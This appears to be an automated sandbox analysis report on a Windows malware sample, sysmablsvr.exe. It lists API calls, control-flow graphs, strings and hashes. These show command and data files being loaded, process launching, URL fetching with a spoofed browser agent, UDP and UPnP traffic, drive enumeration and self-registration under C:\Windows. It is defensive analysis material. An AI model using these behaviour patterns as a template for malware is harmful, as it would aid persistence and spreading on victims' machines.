                                              • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                              • String ID:
                                              • API String ID: 3902698870-0
                                              • Opcode ID: bbc640bda5f038b51350de564496a7af1b726e9883d6f91e6a3899aa04c8a2da
                                              • Instruction ID: 4e6ec57638d856f2454fe90bbc3b1fbf5740e030230db4960ae301055fb20e21
                                              • Opcode Fuzzy Hash: bbc640bda5f038b51350de564496a7af1b726e9883d6f91e6a3899aa04c8a2da
                                              • Instruction Fuzzy Hash: 34515FB4E40208FBDB14DFA4CC49BDFB774AB48704F108569E615B72C0D7B9AA45CB98

                                              Control-flow Graph

                                              control_flow_graph 321 40d860-40d890 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 322 40d896-40d8aa InterlockedExchangeAdd 321->322 323 40d979-40d990 GetCurrentThread SetThreadPriority 321->323 322->323 324 40d8b0-40d8b9 322->324 325 40d8bc-40d8c3 324->325 325->323 326 40d8c9-40d8e4 EnterCriticalSection 325->326 327 40d8ef-40d8f7 326->327 328 40d937-40d94c LeaveCriticalSection 327->328 329 40d8f9-40d906 327->329 332 40d957-40d95d 328->332 333 40d94e-40d955 328->333 330 40d913-40d935 WaitForSingleObject 329->330 331 40d908-40d911 329->331 334 40d8e6-40d8ec 330->334 331->334 335 40d96c-40d974 Sleep 332->335 336 40d95f-40d968 332->336 333->323 334->327 335->325 336->335 337 40d96a 336->337 337->323
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 0040D866
                                              • GetThreadPriority.KERNEL32(00000000,?,?,?,0040805F,00520638,000000FF), ref: 0040D86D
                                              • GetCurrentThread.KERNEL32 ref: 0040D878
                                              • SetThreadPriority.KERNEL32(00000000,?,?,?,0040805F,00520638,000000FF), ref: 0040D87F
                                              • InterlockedExchangeAdd.KERNEL32(0040805F,00000000), ref: 0040D8A2
                                              • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D8D7
                                              • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D922
                                              • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D93E
                                              • Sleep.KERNEL32(00000001), ref: 0040D96E
                                              • GetCurrentThread.KERNEL32 ref: 0040D97D
                                              • SetThreadPriority.KERNEL32(00000000,?,?,?,0040805F), ref: 0040D984
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                              • String ID:
                                              • API String ID: 3862671961-0
                                              • Opcode ID: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                              • Instruction ID: d6bd3df3806ede59070add2f0d7a1f8bc277f5a62d9d5dceae4a540d753efef8
                                              • Opcode Fuzzy Hash: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                              • Instruction Fuzzy Hash: 80413CB4E00209EBDB14DFE4D848BAEBB75EF44305F10C16AE911A7390D7789A85CF59

                                              Control-flow Graph

                                              APIs
                                              • InitializeCriticalSection.KERNEL32(00417F40,?,?,?,?,?,?,00407FE3), ref: 0040B85B
                                              • CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B8AD
                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B8CE
                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B8ED
                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B902
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B968
                                              • CloseHandle.KERNEL32(00000000), ref: 0040B972
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040B97C
                                                • Part of subcall function 0040DA30: NtQuerySystemTime.NTDLL(0040B945), ref: 0040DA3A
                                                • Part of subcall function 0040DA30: RtlTimeToSecondsSince1980.NTDLL(0040B945,?), ref: 0040DA48
                                              Strings
                                              • C:\Users\user\tbtnds.dat, xrefs: 0040B8A8
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                              • String ID: C:\Users\user\tbtnds.dat
                                              • API String ID: 439099756-3213863656
                                              • Opcode ID: 6e33ce8be33ea1410cfce0e5ca66737ed1c773acc2abebe2ac83ecac092f2b8c
                                              • Instruction ID: 20bf7a335d7b83d19979346108b4db2f5a5138f5ba8950715db26485b9768e75
                                              • Opcode Fuzzy Hash: 6e33ce8be33ea1410cfce0e5ca66737ed1c773acc2abebe2ac83ecac092f2b8c
                                              • Instruction Fuzzy Hash: 84413AB4E40308ABDB10DFA4CC4AFAEB774EB04704F208569E611BA2D1C7B96641CB9D

                                              Control-flow Graph

                                              control_flow_graph 384 405b60-405b92 InitializeCriticalSection CreateFileW 385 405c85-405c88 384->385 386 405b98-405bb3 CreateFileMappingW 384->386 387 405bb9-405bd2 MapViewOfFile 386->387 388 405c7b-405c7f CloseHandle 386->388 389 405c71-405c75 CloseHandle 387->389 390 405bd8-405bea GetFileSize 387->390 388->385 389->388 391 405bed-405bf1 390->391 392 405bf3-405bfa 391->392 393 405c67-405c6b UnmapViewOfFile 391->393 394 405bfc 392->394 395 405bfe-405c11 call 40cdb0 392->395 393->389 394->393 398 405c13 395->398 399 405c15-405c2a 395->399 398->393 400 405c3a-405c65 call 405c90 399->400 401 405c2c-405c38 call 40a740 399->401 400->391 401->393
                                              APIs
                                              • InitializeCriticalSection.KERNEL32(004174D8,?,?,?,?,?,00407FAD), ref: 00405B6B
                                              • CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407FAD), ref: 00405B85
                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405BA6
                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405BC5
                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405BDE
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00405C6B
                                              • CloseHandle.KERNEL32(00000000), ref: 00405C75
                                              • CloseHandle.KERNEL32(000000FF), ref: 00405C7F
                                              Strings
                                              • C:\Users\user\tbtcmds.dat, xrefs: 00405B80
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                              • String ID: C:\Users\user\tbtcmds.dat
                                              • API String ID: 3956458805-1042172597
                                              • Opcode ID: 35b4c2d6947d5e03e03b6242c6a307a00e78fae8ded93bcc40d6e7bbcaf7c30e
                                              • Instruction ID: 3caee3762cbdbcce4f49fb41099d7db393733e6e5b5fc44a0020794708857aa0
                                              • Opcode Fuzzy Hash: 35b4c2d6947d5e03e03b6242c6a307a00e78fae8ded93bcc40d6e7bbcaf7c30e
                                              • Instruction Fuzzy Hash: 51313D74A40308EBEB10DBA4CC4ABAFB774EB44704F208569E601772D0D7B96A81CF99

                                              Control-flow Graph

                                              control_flow_graph 406 40ef10-40ef70 memset * 2 CreateProcessW 407 40ef81-40efa5 ShellExecuteW 406->407 408 40ef72-40ef7f Sleep 406->408 409 40efb6 407->409 410 40efa7-40efb4 Sleep 407->410 411 40efb8-40efbb 408->411 409->411 410->411
                                              APIs
                                              • memset.NTDLL ref: 0040EF1E
                                              • memset.NTDLL ref: 0040EF2E
                                              • CreateProcessW.KERNEL32(00000000,00407896,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040EF67
                                              • Sleep.KERNEL32(000003E8), ref: 0040EF77
                                              • ShellExecuteW.SHELL32(00000000,open,00407896,00000000,00000000,00000000), ref: 0040EF92
                                              • Sleep.KERNEL32(000003E8), ref: 0040EFAC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleepmemset$CreateExecuteProcessShell
                                              • String ID: $D$open
                                              • API String ID: 3787208655-2182757814
                                              • Opcode ID: e2b186ad004b62e9ae343f364b445b77cfefa0e7e3aa45da8de068108c2434a4
                                              • Instruction ID: 2af3465f2ac7e3bdaf7f942b51208d096d5e25dcc258d3f6adac25a8060dddc3
                                              • Opcode Fuzzy Hash: e2b186ad004b62e9ae343f364b445b77cfefa0e7e3aa45da8de068108c2434a4
                                              • Instruction Fuzzy Hash: 6F114F71A84308BBEB10DB90DD46FDE7778AB14B00F204125FA09BE2C1D7F56A44C75A

                                              Control-flow Graph

                                              control_flow_graph 412 40de20-40de3a 413 40de4b-40de52 412->413 414 40df04-40df0d 413->414 415 40de58-40de77 recvfrom 413->415 416 40de86-40dea3 StrCmpNIA 415->416 417 40de79-40de84 Sleep 415->417 419 40dea5-40dec4 StrStrIA 416->419 420 40deff 416->420 418 40de3c-40de45 417->418 418->413 419->420 421 40dec6-40defd StrChrA call 40ce30 419->421 420->418 421->420
                                              APIs
                                              • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DE6E
                                              • Sleep.KERNEL32(000003E8), ref: 0040DE7E
                                              • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DE9B
                                              • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DEB1
                                              • StrChrA.SHLWAPI(?,0000000D), ref: 0040DEDE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleeprecvfrom
                                              • String ID: HTTP/1.1 200 OK$LOCATION:
                                              • API String ID: 668330359-3973262388
                                              • Opcode ID: e60f8651836f9e105a51a8b773690953c72053fd89719a78497b2faf5898f70f
                                              • Instruction ID: cf4c7c589cb5a2b5626e628c2cbe2bc4730fcdb76fc9a6090f7a4287b0899cde
                                              • Opcode Fuzzy Hash: e60f8651836f9e105a51a8b773690953c72053fd89719a78497b2faf5898f70f
                                              • Instruction Fuzzy Hash: C92142B0944218ABDB20CB64DC49BE97774AB14308F1085E9E7197B2C0D7B99ACACF5C

                                              Control-flow Graph

                                              Control-flow graph (basic block, address range, API calls, successors):
                                              • 424 40efc0-40efe4 InternetOpenA -> 425, 426
                                              • 425 40efe6-40f003 InternetOpenUrlA -> 427, 428
                                              • 426 40f058-40f069 Sleep
                                              • 427 40f005-40f02c HttpQueryInfoA -> 429, 430
                                              • 428 40f04e-40f052 InternetCloseHandle -> 426
                                              • 429 40f044-40f048 InternetCloseHandle -> 428
                                              • 430 40f02e-40f036 -> 429, 431
                                              • 431 40f038-40f040 -> 429
                                              APIs
                                              • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EFD7
                                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EFF6
                                              • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040F01F
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F048
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F052
                                              • Sleep.KERNEL32(000003E8), ref: 0040F05D
                                              Strings
                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EFD2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                              • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                              • API String ID: 2743515581-2272513262
                                              • Opcode ID: ecc82b78ed0739231bcfbdfeb973cd3a1bf52cd0352c481dc6c1b38e2f15aa13
                                              • Instruction ID: b5bc459e60af10a5ecd3bce89b92fe6334010ad2bd78cd38f87cd536e4e3c5ce
                                              • Opcode Fuzzy Hash: ecc82b78ed0739231bcfbdfeb973cd3a1bf52cd0352c481dc6c1b38e2f15aa13
                                              • Instruction Fuzzy Hash: 6821FC74A40208FBDB20DF94CC49FDEB775AB44705F1085A5FA11AB2C1C7B96A44CB59
                                              APIs
                                              • CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B1A8
                                              • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B1C9
                                              • FlushFileBuffers.KERNEL32(000000FF), ref: 0040B1D3
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040B1DD
                                              • InterlockedExchange.KERNEL32(00416900,0000003D), ref: 0040B1EA
                                              Strings
                                              • C:\Users\user\tbtnds.dat, xrefs: 0040B1A3
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                              • String ID: C:\Users\user\tbtnds.dat
                                              • API String ID: 442028454-3213863656
                                              • Opcode ID: 28d45dda015037e92cc0aa9728b693d27f468723c49624775dc4f20b05194a44
                                              • Instruction ID: c603907199676edbd5c7d0fa982afae34b74f891853afe3642d2180ffa8dca70
                                              • Opcode Fuzzy Hash: 28d45dda015037e92cc0aa9728b693d27f468723c49624775dc4f20b05194a44
                                              • Instruction Fuzzy Hash: 8D313EB4A40209EBCB14DF94EC85FAEB7B4FB48300F20C569E515673D0D774AA41DB99
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep$CacheDeleteEntrywsprintf
                                              • String ID: %s%s
                                              • API String ID: 1447977647-3252725368
                                              • Opcode ID: 2a5e0a3edf9c78aeac98a41108ab1fe6791137a0a25f1b9013466a3a7acc76ac
                                              • Instruction ID: 945b1e68ff25bd35ce4625b60af53a64f9c21a9b46b3aa14aa85a39d9b5f9782
                                              • Opcode Fuzzy Hash: 2a5e0a3edf9c78aeac98a41108ab1fe6791137a0a25f1b9013466a3a7acc76ac
                                              • Instruction Fuzzy Hash: 5D310DB4C00218EFCB50DF95DC88BEDBBB4FB48304F1085AAE609B6290D7795A84CF59
                                              APIs
                                              • GetLogicalDrives.KERNEL32 ref: 00406346
                                              • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                              • RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                              • RegCloseKey.ADVAPI32(?), ref: 004063DE
                                              Strings
                                              • NoDrives, xrefs: 004063B8
                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406387
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseDrivesLogicalOpenQueryValue
                                              • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                              • API String ID: 2666887985-3471754645
                                              • Opcode ID: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                              • Instruction ID: 85ff322c7a95afac5eb7bad71570108e7de378f82f6edd769b1cbb34207a952c
                                              • Opcode Fuzzy Hash: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                              • Instruction Fuzzy Hash: 7F11D071E40209DBDB10CFD0D946BEEBBB4FB08704F108159E915B7280D7B8A655CF95
                                              APIs
                                              • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D714
                                                • Part of subcall function 0040D7E0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D820
                                                • Part of subcall function 0040D7E0: CloseHandle.KERNEL32(?), ref: 0040D839
                                              • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D76F
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D7AC
                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D7B7
                                              • DuplicateHandle.KERNEL32(00000000), ref: 0040D7BE
                                              • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D7D2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                              • String ID:
                                              • API String ID: 2251373460-0
                                              • Opcode ID: 79fa7f5129bcfcfc5e35f54f723da72931e91f9957c0ae906c73dd34cb907117
                                              • Instruction ID: 832ae4800ebcb00f90e7428fbbdd4da527039cf188cbed956f615c5464689476
                                              • Opcode Fuzzy Hash: 79fa7f5129bcfcfc5e35f54f723da72931e91f9957c0ae906c73dd34cb907117
                                              • Instruction Fuzzy Hash: 2C31F874A00208EFDB04DF94D889F9EBBB5FB49304F0085A9E905A7390D775AA95CF54
                                              APIs
                                              • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                              • htons.WS2_32(?), ref: 00401281
                                              • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExchangeInterlockedhtonsmemcpysendto
                                              • String ID: pdu
                                              • API String ID: 2164660128-2320407122
                                              • Opcode ID: 6fa5c5ff501d056adbb62469864e836e9e141a6fe1f3d9c4b2298fbd3bb4f107
                                              • Instruction ID: 395797021da18ac5dc0c4ab187d218299f1ec32cbdde21a351b7e81b9c40248d
                                              • Opcode Fuzzy Hash: 6fa5c5ff501d056adbb62469864e836e9e141a6fe1f3d9c4b2298fbd3bb4f107
                                              • Instruction Fuzzy Hash: E83180762083009BC710DF69D884A9BBBF4AFC9714F04456EFD9897381D634D91587AB
                                              APIs
                                              • CoInitializeEx.OLE32(00000000,00000002,?,?,00407FB7), ref: 00406F78
                                              • SysAllocString.OLEAUT32(C:\Windows\sysmablsvr.exe), ref: 00406F83
                                              • CoUninitialize.OLE32 ref: 00406FA8
                                                • Part of subcall function 00406FC0: SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                              • SysFreeString.OLEAUT32(00000000), ref: 00406FA2
                                              Strings
                                              • C:\Windows\sysmablsvr.exe, xrefs: 00406F7E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: String$Free$AllocInitializeUninitialize
                                              • String ID: C:\Windows\sysmablsvr.exe
                                              • API String ID: 459949847-366549503
                                              • Opcode ID: 04d1d2bcffda370cb2b5a7ceb5013a9587be47d2db71fc951fd56c3c7d876cd0
                                              • Instruction ID: 7397cee9579370c29f446d7a93da1be4fc5365a48f81cc5ba3db23e82f7acdfe
                                              • Opcode Fuzzy Hash: 04d1d2bcffda370cb2b5a7ceb5013a9587be47d2db71fc951fd56c3c7d876cd0
                                              • Instruction Fuzzy Hash: 22E0D8B4940308FBCB00DBE0ED0EB8D7734EB04315F004074F90267291DAB95E80C755
                                              APIs
                                              • GetDriveTypeW.KERNEL32(0040629F), ref: 004062CD
                                              • QueryDosDeviceW.KERNEL32(0040629F,?,00000208), ref: 0040630C
                                              • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406324
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeviceDriveQueryType
                                              • String ID: \??\
                                              • API String ID: 1681518211-3047946824
                                              • Opcode ID: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                              • Instruction ID: fe1cba3e8f96ca8ec28924db8accccc61f2e919e988f9d14e04ecf4ac666ff3a
                                              • Opcode Fuzzy Hash: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                              • Instruction Fuzzy Hash: 1901FFB0A4021CEBCB20DF55DD49BDAB7B4AB04704F00C0BAAA05A7280E6759ED5DF9C
                                              APIs
                                              • ioctlsocket.WS2_32 ref: 0040112B
                                              • recvfrom.WS2_32 ref: 0040119C
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.4234031558.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000001.00000002.4234016394.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234065144.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              • Associated: 00000001.00000002.4234082356.0000000000416000.00000004.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                              • String ID:
                                              • API String ID: 3980219359-0
                                              • Opcode ID: 9fd04ca368f2f0733dbd00e11fcdc64336c0dc17fc499274760987b24178d786
                                              • Instruction ID: e1b7ef358c802af59afb00f280b99e3e8e19274dac2adc7c4e0c886c1a13037e
                                              • Opcode Fuzzy Hash: 9fd04ca368f2f0733dbd00e11fcdc64336c0dc17fc499274760987b24178d786
                                              • Instruction Fuzzy Hash: 1521C3B1504301AFD304DF65DC84A6BB7E9EF88314F004A3EF555A62A0E774DD488BEA
                                              APIs
